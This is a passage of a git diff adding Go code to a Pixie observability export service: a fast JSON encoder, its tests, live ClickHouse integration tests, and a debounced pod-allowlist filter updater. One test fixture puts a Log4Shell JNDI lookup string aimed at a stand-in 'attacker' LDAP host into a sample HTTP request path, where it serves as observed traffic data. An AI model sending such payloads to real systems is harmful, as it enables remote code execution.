size + } + if start < len(s) { + buf.WriteString(s[start:]) + } + buf.WriteByte('"') +} + +// safeJSONByte reports whether b can appear unescaped inside a JSON +// string. Everything 0x20..0x7e except '"' and '\\' is fine. +func safeJSONByte(b byte) bool { + if b < 0x20 || b == '"' || b == '\\' { + return false + } + return b < utf8.RuneSelf +} diff --git a/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go b/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go new file mode 100644 index 00000000000..bb88aecd76d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go @@ -0,0 +1,258 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "encoding/json" + "errors" + "reflect" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +// The fast encoder must produce byte-equivalent JSON to encoding/json +// up to map-key ordering (which CH doesn't care about — JSONEachRow +// is order-agnostic). Round-trip every per-table row shape through +// both encoders and require the PARSED maps are equal. + +func encodeViaJSON(rows []map[string]any) []byte { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + _ = enc.Encode(obj) + } + return buf.Bytes() +} + +func parseNDJSON(b []byte) []map[string]any { + var out []map[string]any + for _, line := range bytes.Split(bytes.TrimRight(b, "\n"), []byte("\n")) { + if len(line) == 0 { + continue + } + var m map[string]any + _ = json.Unmarshal(line, &m) + out = append(out, m) + } + return out +} + +func sampleHTTPRow(i int) map[string]any { + return map[string]any{ + "time_": time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC(), + "upid": "0000000100000000-00000000-0000000000000042", + "namespace": "log4j-poc", + "pod": "backend-vulnerable-779cd9d765-mxr8t", + "remote_addr": "10.0.0.45", + "remote_port": int64(54321), + "local_addr": "10.0.0.12", + "local_port": int64(8080), + "trace_role": int64(2), + "encrypted": uint8(0), + "major_version": int64(1), + "minor_version": int64(1), + "content_type": int64(0), + "req_headers": `{"Content-Type":"application/json"}`, + "req_method": "POST", + "req_path": "/api/v1/${jndi:ldap://attacker/Payload}", + "req_body": `{"id":42}`, + "req_body_size": int64(9), + "resp_headers": `{"Content-Type":"application/json"}`, + "resp_status": int64(500), + "resp_message": "Internal Server Error", + "resp_body": `{"error":"NPE"}`, + "resp_body_size": int64(16), + "latency": int64(123456789), + "hostname": "pixie-worker-node", + "event_time": time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC(), + } +} + +func TestFastEncode_EquivalentToEncodingJSON_HTTPEvents(t *testing.T) { + rows := []map[string]any{sampleHTTPRow(1), sampleHTTPRow(2), sampleHTTPRow(3)} + + var fast bytes.Buffer + if err := encodePixieRowsFast(&fast, "http_events", rows); err != nil { + t.Fatalf("encodePixieRowsFast: %v", err) + } + slow := encodeViaJSON(rows) + + gotFast := parseNDJSON(fast.Bytes()) + gotSlow := parseNDJSON(slow) + if !reflect.DeepEqual(gotFast, gotSlow) { + t.Fatalf("fast vs slow JSON diverged after parse:\n fast=%v\n slow=%v", gotFast, gotSlow) + } +} + +// Cover every pixie table — fast encoder should never silently drop +// columns or differ from the slow path for any of them. +func TestFastEncode_EquivalentToEncodingJSON_AllPixieTables(t *testing.T) { + for _, table := range clickhouse.PixieTables() { + t.Run(table, func(t *testing.T) { + cols, err := clickhouse.Columns(table) + if err != nil { + t.Fatalf("Columns(%q): %v", table, err) + } + // Synthesise one row matching the table's column shape. + row := map[string]any{} + for i, c := range cols { + switch { + case c == "time_" || c == "event_time": + row[c] = time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC() + case c == "encrypted" || c == "ssl": + row[c] = uint8(0) + case strings.Contains(c, "addr") || c == "pod" || c == "namespace" || c == "hostname" || c == "upid" || c == "comm": + row[c] = "value-" + c + case strings.HasSuffix(c, "_size") || strings.HasSuffix(c, "_count") || + strings.HasPrefix(c, "conn_") || strings.HasPrefix(c, "bytes_") || + strings.HasSuffix(c, "_port") || strings.HasSuffix(c, "_role") || + strings.HasSuffix(c, "_version") || strings.HasSuffix(c, "_family") || + c == "protocol" || c == "trace_role" || c == "content_type" || + c == "latency" || c == "resp_status" || c == "major_version" || c == "minor_version": + row[c] = int64(int64(i) + 1) + default: + row[c] = "v" + c + } + } + + var fast bytes.Buffer + if err := encodePixieRowsFast(&fast, table, []map[string]any{row}); err != nil { + t.Fatalf("fast: %v", err) + } + slow := encodeViaJSON([]map[string]any{row}) + + gotFast := parseNDJSON(fast.Bytes()) + gotSlow := parseNDJSON(slow) + if !reflect.DeepEqual(gotFast, gotSlow) { + t.Fatalf("%s fast vs slow diverged:\n fast=%v\n slow=%v", + table, gotFast, gotSlow) + } + }) + } +} + +// Unknown table → ErrUnknownTable so WritePixieRows falls back to the +// encoding/json path without erroring out. +func TestFastEncode_UnknownTable_FallsBack(t *testing.T) { + var buf bytes.Buffer + err := encodePixieRowsFast(&buf, "not_a_real_table", + []map[string]any{{"a": 1}}) + if !errors.Is(err, clickhouse.ErrUnknownTable) { + t.Fatalf("expected ErrUnknownTable, got %v", err) + } +} + +// Unsupported value type → errFastEncodeUnsupported so WritePixieRows +// falls back to encoding/json instead of producing a broken row. +func TestFastEncode_UnsupportedType_FallsBack(t *testing.T) { + type weirdType struct{ X int } + var buf bytes.Buffer + err := encodePixieRowsFast(&buf, "http_events", + []map[string]any{sampleHTTPRow(0), {"time_": weirdType{X: 1}}}) + if !errors.Is(err, errFastEncodeUnsupported) { + t.Fatalf("expected errFastEncodeUnsupported, got %v", err) + } +} + +// event_time derivation — pxapi rows don't carry event_time, only time_. +// The fast encoder MUST emit event_time = time_ rather than skip the +// column (which would silently fall back to CH's epoch-0 default and +// land every row in partition 197001 — rig 6a25c85c regression, aeprod6 +// silent-drop tail). This test is the T2 write-integrity guard +// the operator asked for on PR #47. +func TestFastEncode_EventTime_DerivedFromTime(t *testing.T) { + // Realistic Pixie timestamp; trailing fractional nanos verify the + // time.Time value is emitted verbatim through CH's DateTime64(9) + // shape, which CH then truncates to DateTime64(3) on insert. + pixieTS := time.Unix(0, 1_717_790_021_560_000_000).UTC() + row := sampleHTTPRow(0) + row["time_"] = pixieTS + delete(row, "event_time") // pxapi result rows arrive WITHOUT event_time + + var buf bytes.Buffer + if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil { + t.Fatalf("encodePixieRowsFast: %v", err) + } + parsed := parseNDJSON(buf.Bytes()) + if len(parsed) != 1 { + t.Fatalf("expected 1 row, got %d", len(parsed)) + } + et, ok := parsed[0]["event_time"].(string) + if !ok { + t.Fatalf("event_time absent from encoded row: %v", parsed[0]) + } + // The fast encoder formats time.Time as the CH DateTime64 string + // shape "YYYY-MM-DD HH:MM:SS.NNNNNNNNN" (UTC, 9 fractional digits). + // The exact serialised string the fast encoder produces for this UTC + // time.Time. The pin is by value (not derivation) so a regression in + // the time-string format also trips this test. + want := "2024-06-07 19:53:41.560000000" + if et != want { + t.Fatalf("event_time = %q, want %q (must equal time_ verbatim, not epoch 0)", et, want) + } +} + +// event_time NOT derived when the source row already carries it — caller- +// supplied event_time wins. Belt-and-suspenders: if a future code path +// already filled it correctly, the derivation must not overwrite. +func TestFastEncode_EventTime_NotOverwritten(t *testing.T) { + rowTS := time.Unix(0, 1_717_790_000_000_000_000).UTC() + differentTS := time.Unix(0, 1_700_000_000_000_000_000).UTC() + row := sampleHTTPRow(0) + row["time_"] = rowTS + row["event_time"] = differentTS // caller supplied; must be preserved + + var buf bytes.Buffer + if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil { + t.Fatal(err) + } + parsed := parseNDJSON(buf.Bytes()) + if et := parsed[0]["event_time"].(string); !strings.HasPrefix(et, "2023-11-14") { + t.Fatalf("caller-supplied event_time was overwritten: got %q", et) + } +} + +// Special characters in string columns must JSON-escape the same way +// encoding/json does — otherwise CH would parse different bytes than +// the slow path produces. Tab, newline, quote, backslash, control, +// emoji. +func TestFastEncode_StringEscapesMatch(t *testing.T) { + row := sampleHTTPRow(0) + row["req_body"] = "tab\there\nnewline \"quoted\" back\\slash \x01ctl ☃ emoji 🚀" + row["req_path"] = "/a/ÿ/utf8" + + var fast bytes.Buffer + if err := encodePixieRowsFast(&fast, "http_events", []map[string]any{row}); err != nil { + t.Fatal(err) + } + slow := encodeViaJSON([]map[string]any{row}) + + gotFast := parseNDJSON(fast.Bytes()) + gotSlow := parseNDJSON(slow) + if !reflect.DeepEqual(gotFast, gotSlow) { + t.Fatalf("escape divergence:\n fast=%v\n slow=%v", gotFast, gotSlow) + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/integration_test.go b/src/vizier/services/adaptive_export/internal/sink/integration_test.go new file mode 100644 index 00000000000..343510d991f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/integration_test.go @@ -0,0 +1,218 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package sink_test + +import ( + "context" + "crypto/sha256" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// Live integration tests for the operator's ClickHouse write path. +// Driven against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT. +// Skipped if unset. + +func env(t *testing.T) (endpoint, user, pass string) { + t.Helper() + endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT") + if endpoint == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func ensureSchema(t *testing.T, endpoint, user, pass string) { + t.Helper() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } +} + +func chCount(t *testing.T, endpoint, user, pass, query string) int { + t.Helper() + q := url.Values{} + q.Set("query", query) + req, _ := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil) + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("count: %v", err) + } + defer resp.Body.Close() + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + if resp.StatusCode/100 != 2 { + t.Fatalf("count HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + var n int + fmt.Sscanf(strings.TrimSpace(string(body)), "%d", &n) + return n +} + +// TestSinkWriteAttribution_Live exercises Write() — the operator's only +// production write surface (forensic_db.adaptive_attribution). One row +// per arriving anomaly; ReplacingMergeTree(t_end) collapses re-inserts. +func TestSinkWriteAttribution_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + s, err := sink.New(sink.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + }) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + // Unique anomaly_hash per test run — keeps assertions decoupled + // from any pre-existing rows. + tag := fmt.Sprintf("aw-test-%d", time.Now().UnixNano()) + sum := sha256.Sum256([]byte(tag)) + hash := anomaly.AnomalyHash(fmt.Sprintf("%x", sum[:8])) + + now := time.Now().UTC() + row := sink.AttributionRow{ + AnomalyHash: hash, + Namespace: "redis", + Pod: "redis-test", + Comm: "redis-server", + PID: 1234, + Hostname: tag, // unique hostname → unique row + TStart: now.Add(-5 * time.Minute), + TEnd: now.Add(5 * time.Minute), + LastSeen: now, + LastRuleID: "R1005", + NAnomalies: 1, + } + ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + if err := s.Write(ctx, []sink.AttributionRow{row}); err != nil { + t.Fatalf("Write: %v", err) + } + + got := chCount(t, endpoint, user, pass, + fmt.Sprintf("SELECT count() FROM forensic_db.adaptive_attribution WHERE hostname='%s'", tag)) + if got != 1 { + t.Errorf("adaptive_attribution count for hostname=%s: got %d, want 1", tag, got) + } +} + +// TestSinkWritePixieRows_Live exercises WritePixieRows() against every +// pixie observation table the operator owns. This is the precise bug +// surface the user reported — silent INSERT failures here mean the +// per-table fan-out writes nothing and the analyst sees empty tables. +// +// One row per table, with a unique hostname per run so subsequent runs +// don't have to reset the cluster. +func TestSinkWritePixieRows_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + s, err := sink.New(sink.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + }) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + tag := fmt.Sprintf("aw-pix-%d", time.Now().UnixNano()) + now := time.Now().UTC() + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + for _, table := range chpkg.PixieTables() { + row := minimalRowFor(table, tag, now) + if err := s.WritePixieRows(ctx, table, []map[string]any{row}); err != nil { + t.Errorf("WritePixieRows(%s): %v", table, err) + continue + } + ident := table + if strings.Contains(table, ".") { + ident = "`" + table + "`" + } + got := chCount(t, endpoint, user, pass, + fmt.Sprintf("SELECT count() FROM forensic_db.%s WHERE hostname='%s'", ident, tag)) + if got < 1 { + t.Errorf("table %s after WritePixieRows: count=%d, want >=1", table, got) + } + } +} + +// minimalRowFor returns the minimum-viable row map for a pixie +// observation table — only the columns the schema marks NOT NULL and +// that don't have DEFAULT clauses. The remaining columns get CH +// defaults (0 / "" / now). +func minimalRowFor(table, hostname string, t time.Time) map[string]any { + base := map[string]any{ + "time_": t.Format("2006-01-02 15:04:05.000000000"), + "upid": "0:0:0", + "hostname": hostname, + "event_time": t.Format("2006-01-02 15:04:05.000"), + "namespace": "default", + "pod": "test-pod", + } + // Some pixie tables use slightly different column shapes — provide + // the strict-minimum extras to avoid CH MissingColumn errors. + switch table { + case "http_events": + base["resp_status"] = 200 + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + case "dns_events": + base["remote_port"] = 53 + base["local_port"] = 0 + base["latency"] = 0 + case "redis_events", "mysql_events", "pgsql_events", "cql_events", "mongodb_events", + "amqp_events", "mux_events", "tls_events": + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + case "http2_messages.beta": + base["remote_port"] = 0 + base["local_port"] = 0 + case "kafka_events.beta": + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + } + return base +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel b/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel new file mode 100644 index 00000000000..94823988493 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel @@ -0,0 +1,44 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "streaming", + srcs = [ + "filter.go", + "notifier.go", + "scanner.go", + "supervisor.go", + "writer.go", + ], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/streaming", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/activeset", + "//src/vizier/services/adaptive_export/internal/reconcile", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "streaming_test", + srcs = [ + "filter_test.go", + "integration_test.go", + "notifier_test.go", + "scanner_test.go", + ], + embed = [":streaming"], + deps = [ + "//src/vizier/services/adaptive_export/internal/activeset", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/streaming/filter.go b/src/vizier/services/adaptive_export/internal/streaming/filter.go new file mode 100644 index 00000000000..195fccf30cc --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/filter.go @@ -0,0 +1,258 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package streaming implements the rev-3 push-flow: long-running +// PxL submissions per pixie table, with a pod allowlist derived from +// the ActiveSet. See .local/adaptive-write-rev3-plan.md for the full +// architectural rationale. +package streaming + +import ( + "context" + "sync" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// FilterMode selects how the embedded PxL allowlist is constructed. +type FilterMode int + +const ( + // FilterModeAllowlist embeds an explicit pod list in the PxL + // `df = df[df.pod.in_([...])]` clause. Optimal while the set is + // small. + FilterModeAllowlist FilterMode = iota + + // FilterModeUnfiltered emits the script WITHOUT a pod filter — + // the stream returns ALL pods on this node. Used when the active + // set exceeds MaxAllowlistSize: the PxL script-size limit + parse + // cost would dominate; we prefer to pull everything and filter + // in the operator's CH writer. Memory-speed filtering beats + // linear-in-N PxL parse cost. + FilterModeUnfiltered +) + +// String for log output. +func (m FilterMode) String() string { + switch m { + case FilterModeAllowlist: + return "allowlist" + case FilterModeUnfiltered: + return "unfiltered" + default: + return "unknown" + } +} + +// Filter is the immutable snapshot that a TableScanner uses to +// produce one PxL submission. +type Filter struct { + Mode FilterMode + Pods []activeset.Key // populated iff Mode == Allowlist + Version uint64 // ActiveSet version this filter was derived from +} + +// UpdaterConfig tunes the FilterUpdater. +type UpdaterConfig struct { + // Debounce coalesces multiple ActiveSet deltas into one filter + // emission. With many concurrent activations (e.g. cluster-wide + // incident), this caps re-submission rate at 1 / Debounce per + // TableScanner. 0 → 1 second default. + Debounce time.Duration + + // MaxAllowlistSize is the threshold at which we switch to + // FilterModeUnfiltered. 0 → 500 default. -1 disables the cap + // (allowlist always; PxL parse cost is yours to own). + MaxAllowlistSize int + + // SubscribeBuffer is the per-subscriber delta buffer size on the + // underlying ActiveSet subscription. 0 → 32 default. + SubscribeBuffer int +} + +func (c UpdaterConfig) defaulted() UpdaterConfig { + if c.Debounce <= 0 { + c.Debounce = 1 * time.Second + } + if c.MaxAllowlistSize == 0 { + c.MaxAllowlistSize = 500 + } + if c.SubscribeBuffer <= 0 { + c.SubscribeBuffer = 32 + } + return c +} + +// FilterUpdater bridges ActiveSet → TableScanner. It subscribes to +// ActiveSet deltas, debounces them, and emits a coalesced Filter on +// its output channel. Run() owns one goroutine. +type FilterUpdater struct { + set *activeset.ActiveSet + cfg UpdaterConfig + + // deltaCh is the underlying ActiveSet subscription, established + // at construction (not in Run) so callers can deterministically + // Upsert into `set` after NewUpdater returns and know those + // upserts will be delivered. Without this, Run's goroutine + // might not have subscribed to the set yet when the first + // Upsert lands → silent drop. + deltaCh <-chan activeset.Delta + + mu sync.Mutex + subs []chan Filter + closed bool +} + +// NewUpdater wires an updater AND establishes its ActiveSet +// subscription. Call Run(ctx) to start its goroutine. +func NewUpdater(set *activeset.ActiveSet, cfg UpdaterConfig) *FilterUpdater { + d := cfg.defaulted() + return &FilterUpdater{ + set: set, + cfg: d, + deltaCh: set.Subscribe(d.SubscribeBuffer), + } +} + +// Subscribe returns a buffered channel that receives a fresh Filter +// after each debounce window in which one or more deltas landed. +// Plus one initial Filter representing the current snapshot, so a +// subscriber can build its first PxL submission without waiting. +// +// Channel is closed when ctx (from Run) is cancelled. +func (u *FilterUpdater) Subscribe() <-chan Filter { + u.mu.Lock() + defer u.mu.Unlock() + ch := make(chan Filter, 4) + if !u.closed { + // Seed with the current snapshot so first PxL submission + // doesn't have to wait for a delta to arrive. + ch <- u.computeFilter() + } + u.subs = append(u.subs, ch) + return ch +} + +// Run owns the FilterUpdater goroutine until ctx is cancelled. +// +// Lifecycle: +// +// deltaCh = set.Subscribe(buffer) +// for { +// select { +// case <-ctx.Done(): close subs; return +// case <-deltaCh: schedule a fire at now+Debounce (idempotent) +// case <-fireTimer: compute filter; broadcast to subs +// } +// } +// +// The fire-timer is rearmed only when a delta arrives; in steady +// state with no deltas, this goroutine is dormant. +func (u *FilterUpdater) Run(ctx context.Context) { + defer u.closeSubs() + defer u.set.Unsubscribe(u.deltaCh) + + var pendingTimer *time.Timer + var pendingC <-chan time.Time + arm := func() { + if pendingTimer != nil { + return // already scheduled + } + pendingTimer = time.NewTimer(u.cfg.Debounce) + pendingC = pendingTimer.C + } + disarm := func() { + if pendingTimer != nil { + pendingTimer.Stop() + pendingTimer = nil + pendingC = nil + } + } + + for { + select { + case <-ctx.Done(): + disarm() + return + + case _, ok := <-u.deltaCh: + if !ok { + // ActiveSet shutdown: disarm any pending timer so its + // goroutine doesn't outlive Run trying to send on + // pendingC (CodeRabbit r3379377645). + disarm() + return + } + arm() + + case <-pendingC: + disarm() + f := u.computeFilter() + u.broadcast(f) + log.WithFields(log.Fields{ + "mode": f.Mode, + "pods": len(f.Pods), + "version": f.Version, + }).Info("streaming.FilterUpdater: emitted filter") + } + } +} + +// computeFilter snapshots the ActiveSet and decides whether to embed +// an allowlist or fall back to unfiltered mode based on size. +func (u *FilterUpdater) computeFilter() Filter { + keys, version := u.set.Snapshot() + if u.cfg.MaxAllowlistSize > 0 && len(keys) > u.cfg.MaxAllowlistSize { + return Filter{Mode: FilterModeUnfiltered, Version: version} + } + return Filter{Mode: FilterModeAllowlist, Pods: keys, Version: version} +} + +// broadcast non-blockingly delivers to every subscriber. Subscribers +// that fall behind get the OLDEST filter dropped — the newest state +// always reaches them (their PxL re-submission is what matters; old +// filter versions are stale by construction). +func (u *FilterUpdater) broadcast(f Filter) { + u.mu.Lock() + defer u.mu.Unlock() + for _, ch := range u.subs { + select { + case ch <- f: + default: + select { + case <-ch: + default: + } + select { + case ch <- f: + default: + } + } + } +} + +func (u *FilterUpdater) closeSubs() { + u.mu.Lock() + defer u.mu.Unlock() + u.closed = true + for _, ch := range u.subs { + close(ch) + } + u.subs = nil +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/filter_test.go b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go new file mode 100644 index 00000000000..a9167261377 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go @@ -0,0 +1,233 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +func TestFilterUpdater_DebouncesMultipleDeltas(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{Debounce: 50 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + + // Drain the initial snapshot (empty). + <-ch + + // Bombard with 10 distinct upserts inside the debounce window. + for i := 0; i < 10; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + + // Wait one debounce window + slack and count how many filter + // emissions arrived. Should be exactly one — the coalesced one. + deadline := time.After(300 * time.Millisecond) + count := 0 + var lastF Filter + collecting := true + for collecting { + select { + case f := <-ch: + count++ + lastF = f + case <-deadline: + collecting = false + } + } + if count != 1 { + t.Fatalf("expected 1 coalesced filter emission, got %d", count) + } + if len(lastF.Pods) != 10 { + t.Fatalf("expected 10 pods in coalesced filter, got %d", len(lastF.Pods)) + } +} + +func TestFilterUpdater_FallsBackToUnfilteredOnSizeCap(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 20 * time.Millisecond, + MaxAllowlistSize: 3, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch // initial empty + + for i := 0; i < 5; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + select { + case f := <-ch: + if f.Mode != FilterModeUnfiltered { + t.Fatalf("expected unfiltered mode (5 > cap 3), got %v", f.Mode) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no filter emission") + } +} + +// TestFilterUpdater_CapBoundary_AtLimit — exactly MaxAllowlistSize +// pods MUST stay in allowlist mode (not flip to unfiltered). +func TestFilterUpdater_CapBoundary_AtLimit(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 10 * time.Millisecond, + MaxAllowlistSize: 3, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch + for i := 0; i < 3; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + f := waitForFilter(t, ch, 300*time.Millisecond) + if f.Mode != FilterModeAllowlist { + t.Fatalf("at exactly cap=3, expected allowlist, got %v", f.Mode) + } + if len(f.Pods) != 3 { + t.Fatalf("expected 3 pods in allowlist, got %d", len(f.Pods)) + } +} + +// TestFilterUpdater_CapBoundary_OneOverLimit — cap+1 pods MUST flip +// to unfiltered. This is the exact boundary just above the cap. +func TestFilterUpdater_CapBoundary_OneOverLimit(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 10 * time.Millisecond, + MaxAllowlistSize: 3, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch + for i := 0; i < 4; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + f := waitForFilter(t, ch, 300*time.Millisecond) + if f.Mode != FilterModeUnfiltered { + t.Fatalf("at cap+1=4, expected unfiltered, got %v with %d pods", f.Mode, len(f.Pods)) + } +} + +// TestFilterUpdater_CapBoundary_RecoversAfterShrink — going from +// unfiltered (set was huge) back to a small set MUST switch back to +// allowlist mode. Without this, a transient burst that hit the cap +// would force unfiltered mode forever. +func TestFilterUpdater_CapBoundary_RecoversAfterShrink(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 10 * time.Millisecond, + MaxAllowlistSize: 3, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch + + // Burst above cap. + for i := 0; i < 10; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + f := waitForFilter(t, ch, 300*time.Millisecond) + if f.Mode != FilterModeUnfiltered { + t.Fatalf("expected unfiltered after burst, got %v", f.Mode) + } + // Shrink back below cap. + for i := 3; i < 10; i++ { + set.Remove(activeset.Key{Pod: string(rune('a' + i))}) + } + // Drain any intermediate filters; verify the LATEST emission is + // back to allowlist mode. + deadline := time.Now().Add(500 * time.Millisecond) + last := f + for time.Now().Before(deadline) { + select { + case last = <-ch: + case <-time.After(100 * time.Millisecond): + } + if last.Mode == FilterModeAllowlist { + return // recovered + } + } + t.Fatalf("did not recover to allowlist mode after shrink; last mode=%v pods=%d", + last.Mode, len(last.Pods)) +} + +// TestFilterUpdater_CapDisabled_AllowsAnySize — when MaxAllowlistSize <= 0 +// the cap is disabled and even very large sets stay in allowlist mode. +func TestFilterUpdater_CapDisabled_AllowsAnySize(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 10 * time.Millisecond, + MaxAllowlistSize: -1, // explicit disable + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch + for i := 0; i < 100; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a'+i%26)) + string(rune('a'+i/26))}, time.Now().Add(time.Minute)) + } + f := waitForFilter(t, ch, 300*time.Millisecond) + if f.Mode != FilterModeAllowlist { + t.Fatalf("with cap disabled (=-1), expected allowlist; got %v", f.Mode) + } +} + +// waitForFilter polls ch until a filter shows up, returning it. +func waitForFilter(t *testing.T, ch <-chan Filter, timeout time.Duration) Filter { + t.Helper() + select { + case f := <-ch: + return f + case <-time.After(timeout): + t.Fatalf("no filter within %v", 